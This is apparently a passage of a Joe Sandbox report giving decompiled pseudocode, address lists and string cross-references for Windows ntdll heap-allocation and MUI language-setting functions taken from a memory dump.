0x34f00188
0x34f0013b
0x34f0013e
0x34f0015d
0x34f00162
0x34f00140
0x34f00155
0x34f0015a
0x34f00168
0x34f00176
0x00000000
0x34effef6
0x34effef6
0x34effefc
0x34efff02
0x34efff70
0x34efff73
0x34efff76
0x34efff7b
0x34f00068
0x34f00070
0x34f00075
0x34f00078
0x34f0007a
0x34f00080
0x34f00080
0x34f00083
0x34f00087
0x34f00090
0x34f00090
0x34f00090
0x34f00092
0x34f00094
0x34f00097
0x34f0009a
0x34f0009f
0x34f000a9
0x34f000ac
0x34f000ae
0x34f000af
0x34f000b3
0x34f000b3
0x34f000ac
0x34f000b8
0x34f000bc
0x34f000ec
0x34f000ef
0x34f000f2
0x34f000be
0x34f000c0
0x34f000c5
0x34f000ca
0x34f000d1
0x34f000e3
0x34f000d3
0x34f000d4
0x34f000d9
0x34f000dc
0x34f000df
0x34f000df
0x34f000e6
0x34f000e6
0x34f000f5
0x34f000f9
0x34f000fc
0x34f00108
0x34f0010e
0x34f0010e
0x34f0010e
0x34f000fc
0x34f00114
0x34f00119
0x34f0011d
0x00000000
0x34f0011d
0x34efff81
0x34efff88
0x00000000
0x00000000
0x34efff8e
0x34efff91
0x34efff94
0x34efff97
0x34efff9c
0x34efffa6
0x34efffa9
0x34efffab
0x34efffb0
0x34efffb5
0x34efffb5
0x34efffa9
0x34efffb8
0x34efffbc
0x34efffce
0x34efffd1
0x34efffd4
0x34efffbe
0x34efffc0
0x34efffc5
0x34efffc8
0x34efffc8
0x34efffd7
0x34efffd9
0x34efffdd
0x34efffe0
0x34efffea
0x34effff0
0x34effff0
0x34effff0
0x34effff2
0x34effff5
0x34f00065
0x34f00065
0x34effff7
0x34effff7
0x34effffe
0x00000000
0x00000000
0x34f00004
0x34f0000b
0x00000000
0x00000000
0x34f0000d
0x34f00013
0x34f00016
0x34f00035
0x34f0003a
0x34f00018
0x34f0002d
0x34f00032
0x34f00040
0x34f0004b
0x34f0004c
0x34f0004f
0x34f00058
0x34f0005d
0x34efff47
0x34efff47
0x34efff4d
0x34efff51
0x34efff57
0x34efff5e
0x34efff64
0x34efff65
0x34efff65
0x34efff51
0x00000000
0x34effff5
0x34efff04
0x34efff07
0x34efff26
0x34efff2b
0x34efff09
0x34efff1e
0x34efff23
0x34efff31
0x34efff3f
0x34efff44
0x00000000
0x34efff44
0x34effe18
0x34effe20
0x34effe28
0x34effe2e
0x34f002d1
0x34f002d4
0x34f002e0
0x34f002e0

APIs

RtlDebugPrintTimes.NTDLL ref: 34EFFE28

Strings

HEAP: , xrefs: 34EFFF26, 34F00035, 34F0015D, 34F00202, 34F00259
HEAP[%wZ]: , xrefs: 34EFFF19, 34F00028, 34F00150, 34F001F5, 34F0024C
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 34F0026A
Just reallocated block at %p to %Ix bytes, xrefs: 34F00171
RtlReAllocateHeap, xrefs: 34EFFE3F, 34EFFEE2
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 34F0021F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 34F00053
About to reallocate block at %p to %Ix bytes, xrefs: 34EFFF3A

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: c65d6da99853e4b28a44710a7950968b4ba093a71c901aaf01c20ada653f46ee
Instruction ID: 3b7152952845e202ea3bffdc1b702c4264578c4d544878211c4c78a3a2f410a4
Opcode Fuzzy Hash: c65d6da99853e4b28a44710a7950968b4ba093a71c901aaf01c20ada653f46ee
Instruction Fuzzy Hash: 00D10536610685EFEB01CFA4E840AADBBF1FF89714F48C859E444AB352CB35A942DF54

Uniqueness

Uniqueness Score: -1.00%

Function 34E4D2EC Relevance: 12.8, Strings: 10, Instructions: 312
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E34E4D2EC(unsigned int __ecx, signed int _a4, intOrPtr _a8, char* _a12, char _a16) {
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				unsigned int _v100;
				signed int _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v117;
				char _v120;
				char _v124;
				intOrPtr _v128;
				void* _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v164;
				void* _t116;
				void* _t124;
				char* _t134;
				void* _t155;
				char* _t170;
				char _t171;
				void* _t176;
				signed int _t181;
				void* _t184;
				void* _t190;
				signed int _t192;
				void* _t194;
				signed int _t196;
				signed int _t198;
				void* _t200;

				_t200 = (_t198 & 0xfffffff8) - 0x74;
				_t170 = _a12;
				_v100 = __ecx;
				_v108 = 0;
				_v112 = 0;
				_v104 = 0;
				_v96 = 7;
				_v92 = 0;
				_v88 = 0;
				_v117 = 0;
				_t190 = 0;
				_v116 = 0;
				if(__ecx == 0 || _t170 == 0 || _a16 == 0) {
					_t194 = 0xc000000d;
					goto L23;
				} else {
					_t196 = _a4;
					 *_t170 = 0;
					if(_t196 == 1 || _t196 == 0) {
						E34E95050(0,  &_v84, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
						_v84 = 0x18;
						_v76 =  &_v92;
						_v80 = 0;
						_push( &_v84);
						_push(0x20019);
						_v72 = 0x40;
						_push( &_v112);
						_v68 = 0;
						_v64 = 0;
						if(E34E92AB0() >= 0) {
							_t124 = E34E47220(_v104, _v100,  &_v116);
							_t190 = _v128;
							_t194 = _t124;
							if(_t194 != 0 || _t190 == 0) {
								_t181 = _v104;
								_t196 = _a4;
								goto L7;
							} else {
								goto L24;
							}
						} else {
							_t181 = 0;
							_v104 = 0;
							L7:
							if(_t196 == 1 && _t181 != 0) {
								_t187 =  &_v117;
								if(E34F0AD61(_t181,  &_v117) >= 0) {
									asm("sbb eax, eax");
									_a4 = _t196 &  ~(_v117 - 0x00000001 & 0x000000ff);
								}
							}
							_t194 = E34E4D736(0x2000000,  &_v108);
							if(_t194 < 0) {
								L51:
								 *_t170 = 1;
								goto L23;
							} else {
								if(_a4 != 1) {
									E34E95050(0x2000000,  &_v84, L"Control Panel\\Desktop\\MuiCached");
									_t194 = 0;
									_v32 = _v116;
									_v28 =  &_v92;
									_push( &_v36);
									_push(0x20019);
									_v36 = 0x18;
									_push( &_v120);
									_v24 = 0x40;
									_v20 = 0;
									 *((intOrPtr*)(_t200 + 0x88)) = 0;
									if(E34E92AB0() < 0) {
										 *_t170 = 1;
										L24:
										_t176 = 0;
										L25:
										_t112 = _a4;
										if(_a4 != 0 || _t190 != 0 &&  *((intOrPtr*)(_t190 + 4)) != _t176) {
											_t173 = _v100;
											L29:
											if(_t190 == 0) {
												_t190 = E34E73262(1, _t187 & 0xffffff00 | _t112 != 0x00000001, _t173);
												if(_t190 == 0) {
													_t194 = 0xc0000017;
												}
											}
											goto L31;
										} else {
											_t173 = _v100;
											_t116 = E34F0BD08(_v100, _t187, _t170,  &_v116);
											_t190 = _v124;
											_t194 = _t116;
											if(_t194 != 0) {
												L31:
												_t67 =  &_a16; // 0x34e72e68
												 *((intOrPtr*)( *_t67)) = _t190;
												L32:
												_t105 = _v88;
												if(_v88 == 0) {
													L43:
													_t171 = 0;
													goto L34;
												} else {
													_t171 = 0;
													L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t105);
													L34:
													if(_v112 != 0) {
														_push(_v112);
														E34E92A80();
														_v116 = _t171;
													}
													if(_v108 != 0) {
														_push(_v108);
														E34E92A80();
														_v112 = _t171;
													}
													if(_v104 != 0) {
														_push(_v104);
														E34E92A80();
													}
													goto L39;
												}
											}
											_t112 = _a4;
											goto L29;
										}
									}
									_t134 = L"MachinePreferredUILanguages";
									L15:
									E34E95050(0x2000000,  &_v84, _t134);
									_push(0x2000000);
									_t187 =  &_v92;
									_t184 = E34E4D64A(_v120,  &_v92,  &_v104, _t194,  &_v100);
									_t194 = 0xc0000034;
									if(_t184 == 0xc0000034) {
										L42:
										_t176 = 0;
										 *_t170 = 1;
										_t194 = 0;
										goto L25;
									}
									_t140 = _v96;
									if(_v96 == 0) {
										goto L42;
									}
									if(_t184 != 0x80000005) {
										goto L43;
									}
									_t192 = E34E65D90(_t184,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t140 + 2);
									_v104 = _t192;
									if(_t192 == 0) {
										_t194 = 0xc0000017;
										goto L43;
									}
									_push(_t184);
									_t187 =  &_v88;
									_t194 = E34E4D64A(_v116,  &_v88,  &_v100, _t192,  &_v96);
									if(_t194 < 0) {
										L22:
										_t190 = _v124;
										L23:
										if(_t194 != 0) {
											goto L32;
										}
										goto L24;
									}
									if(_v104 != 7) {
										if(_v104 == 1) {
											goto L21;
										}
										_t190 = _v124;
										_t176 = 0;
										_t194 = 0;
										 *_t170 = 1;
										goto L25;
									}
									L21:
									_t187 = _t192;
									_t194 = L34E74CA6(_v108, _t192, _v100 >> 1, 8, (0 | _a4 != 0x00000001) + 2, 1,  &_v124);
									goto L22;
								}
								_t155 = E34E4D8D0(0x2000000, _v108, _v100,  &_v116);
								_t190 = _v128;
								_t194 = _t155;
								if(_t194 == 0) {
									if(_t190 != 0) {
										goto L31;
									}
								}
								E34E95050(0x2000000,  &_v84, L"Control Panel\\Desktop");
								_v56 = _v116;
								 *((intOrPtr*)(_t200 + 0x58)) =  &_v92;
								 *((intOrPtr*)(_t200 + 0x60)) = 0;
								_v40 = 0;
								_push( &_v60);
								_push(0x20019);
								_v60 = 0x18;
								_push( &_v120);
								 *((intOrPtr*)(_t200 + 0x68)) = 0x40;
								_t194 = E34E92AB0();
								if(_t194 < 0) {
									goto L51;
								}
								_t134 = L"PreferredUILanguages";
								if(_a8 != 3) {
									_t134 = L"PreferredUILanguagesPending";
								}
								_t194 = 0;
								goto L15;
							}
						}
					} else {
						_t194 = 0xc000000d;
						L39:
						return _t194;
					}
				}
			}

0x34e4d2f4
0x34e4d2f8
0x34e4d2ff
0x34e4d303
0x34e4d307
0x34e4d30b
0x34e4d30f
0x34e4d317
0x34e4d31b
0x34e4d31f
0x34e4d325
0x34e4d327
0x34e4d32d
0x34eaa69c
0x00000000
0x34e4d344
0x34e4d344
0x34e4d347
0x34e4d34c
0x34e4d360
0x34e4d369
0x34e4d371
0x34e4d37b
0x34e4d37f
0x34e4d380
0x34e4d389
0x34e4d391
0x34e4d392
0x34e4d396
0x34e4d3a1
0x34eaa60d
0x34eaa612
0x34eaa616
0x34eaa61a
0x34eaa624
0x34eaa628
0x00000000
0x00000000
0x00000000
0x00000000
0x34e4d3a7
0x34e4d3a7
0x34e4d3a9
0x34e4d3ad
0x34e4d3b0
0x34eaa630
0x34eaa63b
0x34eaa64c
0x34eaa650
0x34eaa650
0x34eaa63b
0x34e4d3c9
0x34e4d3cd
0x34eaa658
0x34eaa658
0x00000000
0x34e4d3d3
0x34e4d3d7
0x34e4d5d5
0x34e4d5de
0x34e4d5e0
0x34e4d5e8
0x34e4d5f0
0x34e4d5f1
0x34e4d5fa
0x34e4d602
0x34e4d603
0x34e4d60e
0x34e4d615
0x34e4d623
0x34e4d642
0x34e4d52e
0x34e4d52e
0x34e4d530
0x34e4d530
0x34e4d535
0x34e4d549
0x34e4d54d
0x34e4d54f
0x34e4d560
0x34e4d564
0x34eaa6cd
0x34eaa6cd
0x34e4d564
0x00000000
0x34eaa6a6
0x34eaa6ac
0x34eaa6b2
0x34eaa6b7
0x34eaa6bb
0x34eaa6bf
0x34e4d56a
0x34e4d56a
0x34e4d56d
0x34e4d56f
0x34e4d56f
0x34e4d575
0x34e4d63b
0x34e4d63b
0x00000000
0x34e4d57b
0x34e4d582
0x34e4d588
0x34e4d58d
0x34e4d592
0x34e4d594
0x34e4d598
0x34e4d59d
0x34e4d59d
0x34e4d5a6
0x34e4d5a8
0x34e4d5ac
0x34e4d5b1
0x34e4d5b1
0x34e4d5ba
0x34eaa6d7
0x34eaa6db
0x34eaa6db
0x00000000
0x34e4d5ba
0x34e4d575
0x34eaa6c5
0x00000000
0x34eaa6c5
0x34e4d535
0x34e4d625
0x34e4d465
0x34e4d46b
0x34e4d470
0x34e4d480
0x34e4d489
0x34e4d48b
0x34e4d492
0x34e4d62f
0x34e4d62f
0x34e4d631
0x34e4d634
0x00000000
0x34e4d634
0x34e4d498
0x34e4d49e
0x00000000
0x00000000
0x34e4d4aa
0x00000000
0x00000000
0x34e4d4c4
0x34e4d4c6
0x34e4d4cc
0x34eaa677
0x00000000
0x34eaa677
0x34e4d4d2
0x34e4d4e2
0x34e4d4eb
0x34e4d4ef
0x34e4d526
0x34e4d526
0x34e4d52a
0x34e4d52c
0x00000000
0x00000000
0x00000000
0x34e4d52c
0x34e4d4f6
0x34eaa686
0x00000000
0x00000000
0x34eaa68c
0x34eaa690
0x34eaa692
0x34eaa694
0x00000000
0x34eaa694
0x34e4d4fc
0x34e4d507
0x34e4d524
0x00000000
0x34e4d524
0x34e4d3ea
0x34e4d3ef
0x34e4d3f3
0x34e4d3f7
0x34eaa662
0x00000000
0x00000000
0x34eaa668
0x34e4d407
0x34e4d410
0x34e4d418
0x34e4d41e
0x34e4d422
0x34e4d42a
0x34e4d42b
0x34e4d434
0x34e4d43c
0x34e4d43d
0x34e4d44a
0x34e4d44e
0x00000000
0x00000000
0x34e4d458
0x34e4d45d
0x34eaa66d
0x34eaa66d
0x34e4d463
0x00000000
0x34e4d463
0x34e4d3cd
0x34eaa5f6
0x34eaa5f6
0x34e4d5c0
0x34e4d5c8
0x34e4d5c8
0x34e4d34c

Strings

Control Panel\Desktop\MuiCached, xrefs: 34E4D5CB
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 34E4D356
MachinePreferredUILanguages, xrefs: 34E4D625
PreferredUILanguagesPending, xrefs: 34EAA66D
@, xrefs: 34E4D603
@, xrefs: 34E4D43D
Control Panel\Desktop, xrefs: 34E4D3FD
PreferredUILanguages, xrefs: 34E4D458, 34E4D465
h.4, xrefs: 34E4D56A
@, xrefs: 34E4D389

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.4
API String ID: 0-4052609050
Opcode ID: 8f26ac2c12451fef1676b9c0389833b68a6a4263a2441335f4c58d618093abe0
Instruction ID: 9609acc109b12b5046e7d86acc8425edbed402b8a02f4f412c9dafcb6ee2de6a
Opcode Fuzzy Hash: 8f26ac2c12451fef1676b9c0389833b68a6a4263a2441335f4c58d618093abe0
Instruction Fuzzy Hash: ADB17AB6908341DFE711CF64E480E5FB7E8AB88758F46492EF888D7340DB74D9488B92

Uniqueness

Uniqueness Score: -1.00%

Function 34EF86C2 Relevance: 12.6, Strings: 10, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E34EF86C2(void* __ebx, signed short* __ecx, signed short __edx) {
				signed int _v8;
				char _v268;
				char _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				char _v1076;
				signed int _v1084;
				signed int _v1092;
				signed short _v1096;
				void* __edi;
				void* __esi;
				signed int _t54;
				short* _t59;
				void* _t65;
				signed int _t66;
				void* _t67;
				intOrPtr _t69;
				void* _t74;
				void* _t75;
				void* _t80;
				void* _t81;
				signed short _t82;
				signed short* _t84;
				void* _t85;
				intOrPtr* _t86;
				signed int _t90;
				void* _t92;
				signed int _t93;
				signed int _t95;

				_t82 = __edx;
				_t75 = __ebx;
				_t95 = (_t93 & 0xfffffff8) - 0x448;
				_v8 =  *0x34f4b370 ^ _t95;
				_t84 = __ecx;
				_v324 = L"svchost.exe";
				_v320 = L"runtimebroker.exe";
				_t90 = 0;
				_v316 = L"csrss.exe";
				_v312 = L"smss.exe";
				_v308 = L"services.exe";
				_v304 = L"lsass.exe";
				_v1084 =  *[fs:0x30];
				if((E34E50670() & 0x00010000) != 0) {
					L26:
					 *0x34f438c0 = _t90;
					_t90 = 1;
				} else {
					if(E34E542B0(0, 0, L"http://schemas.microsoft.com/SMI/2020/WindowsSettings", L"heapType",  &_v300, 0xf, 0) < 0) {
						L3:
						_t54 = _v1084;
						if(( *(_t54 + 3) & 0x00000010) == 0) {
							if( *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x2b0)) != _t90) {
								goto L26;
							} else {
								if(_t84 != 0) {
									_t79 = _t90;
									_t82 = _t84[2];
									_t59 = _t82 + ((( *_t84 & 0x0000ffff) >> 1) - 1) * 2;
									while(1) {
										_v1092 = _t79;
										if(_t59 <= _t82) {
											break;
										}
										if( *_t59 == 0x5c) {
											if(_t79 == 0) {
												L24:
												_v1096 = 0x100;
												if(E34E84E50(0xfffffffc,  &_v268,  &_v1096, _t90, _t90, _t90,  &_v1084) >= 0) {
													_t65 = E34E97AD0( &_v268, L"DefaultBrowser_NOPUBLISHERID", 0x1d);
													_t95 = _t95 + 0xc;
													if(_t65 == 0) {
														goto L26;
													}
												}
											} else {
												_t28 = _t59 + 2; // 0x2
												_t82 = _t28;
												_v1096 = _t82;
												if(_t82 != 0) {
													_t66 = _t90;
													_v1084 = _t90;
													do {
														_t86 =  *((intOrPtr*)(_t95 + 0x310 + _t66 * 4));
														_t67 = E34E97AD0(_t82, _t86, _t79);
														_t95 = _t95 + 0xc;
														if(_t67 != 0) {
															_t79 = _v1092;
															goto L23;
														} else {
															_t34 = _t86 + 2; // 0x34e2708e
															_t80 = _t34;
															do {
																_t69 =  *_t86;
																_t86 = _t86 + 2;
															} while (_t69 != _t90);
															_t79 = _v1092;
															if(_v1092 == _t86 - _t80 >> 1) {
																goto L26;
															} else {
																goto L23;
															}
														}
														goto L27;
														L23:
														_t82 = _v1096;
														_t66 = _v1084 + 1;
														_v1084 = _t66;
													} while (_t66 < 6);
												}
												goto L24;
											}
										} else {
											_t79 = _t79 + 1;
											_t59 = _t59 - 2;
											continue;
										}
										goto L27;
									}
									goto L24;
								}
							}
						} else {
							_push(_t90);
							_push( &_v1092);
							_push( &_v1076);
							_t81 = 0xfffffffc;
							if(E34E84F11(_t81) < 0 || (_v1092 & 0x00008000) == 0) {
								goto L26;
							} else {
							}
						}
					} else {
						_t74 = E34E97AD0( &_v300, L"SegmentHeap", 0xf);
						_t95 = _t95 + 0xc;
						if(_t74 == 0) {
							goto L26;
						} else {
							goto L3;
						}
					}
				}
				L27:
				_pop(_t85);
				_pop(_t92);
				return L34E94B50(_t90, _t75, _v8 ^ _t95, _t82, _t85, _t92);
			}

0x34ef86c2
0x34ef86c2
0x34ef86ca
0x34ef86d7
0x34ef86e6
0x34ef86e8
0x34ef86f3
0x34ef86fe
0x34ef8700
0x34ef870b
0x34ef8716
0x34ef8721
0x34ef872c
0x34ef873a
0x34ef8892
0x34ef8892
0x34ef889a
0x34ef8740
0x34ef875e
0x34ef877f
0x34ef877f
0x34ef8787
0x34ef87c0
0x00000000
0x34ef87c6
0x34ef87c8
0x34ef87d1
0x34ef87d3
0x34ef87d9
0x34ef87e8
0x34ef87e8
0x34ef87ee
0x00000000
0x00000000
0x34ef87e2
0x34ef87f4
0x34ef884f
0x34ef8853
0x34ef8875
0x34ef8886
0x34ef888b
0x34ef8890
0x00000000
0x00000000
0x34ef8890
0x34ef87f6
0x34ef87f6
0x34ef87f6
0x34ef87f9
0x34ef87ff
0x34ef8801
0x34ef8803
0x34ef8807
0x34ef8807
0x34ef8811
0x34ef8816
0x34ef881b
0x34ef8839
0x00000000
0x34ef881d
0x34ef881d
0x34ef881d
0x34ef8820
0x34ef8820
0x34ef8823
0x34ef8826
0x34ef882d
0x34ef8835
0x00000000
0x34ef8837
0x00000000
0x34ef8837
0x34ef8835
0x00000000
0x34ef883d
0x34ef8841
0x34ef8845
0x34ef8846
0x34ef884a
0x34ef8807
0x00000000
0x34ef87ff
0x34ef87e4
0x34ef87e4
0x34ef87e5
0x00000000
0x34ef87e5
0x00000000
0x34ef87e2
0x00000000
0x34ef87f0
0x34ef87c8
0x34ef8789
0x34ef8789
0x34ef878e
0x34ef8793
0x34ef8796
0x34ef879e
0x00000000
0x00000000
0x34ef87b2
0x34ef879e
0x34ef8760
0x34ef876f
0x34ef8774
0x34ef8779
0x00000000
0x00000000
0x00000000
0x00000000
0x34ef8779
0x34ef875e
0x34ef889b
0x34ef88a4
0x34ef88a5
0x34ef88b0

Strings

svchost.exe, xrefs: 34EF86E8
smss.exe, xrefs: 34EF870B
csrss.exe, xrefs: 34EF8700
SegmentHeap, xrefs: 34EF8769
lsass.exe, xrefs: 34EF8721
runtimebroker.exe, xrefs: 34EF86F3
DefaultBrowser_NOPUBLISHERID, xrefs: 34EF8880
heapType, xrefs: 34EF874B
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 34EF8750
services.exe, xrefs: 34EF8716

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 6e9a54ccdf7bcec6f02adbeaa5a994c7b6a6bfffac795f0bb93ad5be465d5082
Instruction ID: 4790002d6f3e81fe15354ce587bdde0b4aa4a9cd6c8cdb12422f99456ab60924
Opcode Fuzzy Hash: 6e9a54ccdf7bcec6f02adbeaa5a994c7b6a6bfffac795f0bb93ad5be465d5082
Instruction Fuzzy Hash: CE519AB66043559FE325DF188C40BABB7E8FF84794F814A1DB99982280E771D618CB92

Uniqueness

Uniqueness Score: -1.00%

Function 34EFF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231
timeCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E34EFF0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push(0x3c);
				_push(0x34f2d320);
				L34EA7BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E34E47662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E34EFF3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_t92 = 0x10;
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							E34E4B910();
						} else {
							E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						E34E4B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E34E5FED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						E34F00835(_t188, 0);
						_t184 = E34E65D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						E34F00D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E34F0D646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = E34E83AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = E34E7FDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E34F00835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x34f447c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x34f447c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x34f447c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									E34E4B910();
								} else {
									E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E34EF823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
